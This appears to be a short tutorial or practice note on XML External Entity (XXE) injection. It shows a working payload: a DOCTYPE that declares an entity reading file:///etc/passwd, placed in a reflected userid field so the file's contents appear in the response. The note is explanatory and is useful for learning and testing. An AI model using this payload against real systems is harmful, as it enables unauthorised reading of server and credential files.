Don’t know how to identify. I guess just gun blazing any xml
Looking at this xml:
<?xml version="1.0" encoding="UTF-8"?>
<root>
<subtotal>undefined</subtotal>
<userid>1206</userid>
</root>We can create this reference.
<!DOCTYPE xxe [
<!ENTITY filedisclosure SYSTEM "file:///etc/passwd">
]>Add it above <root>, then reference filedisclosure where it will output out. In this case, userid is reflected as 1206, so we change it to &filedisclosure;
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ENTITY filedisclosure SYSTEM "file:///etc/passwd">
]>
<root>
<subtotal>undefined</subtotal>
<userid>&filedisclosure;</userid>
</root>Like this:
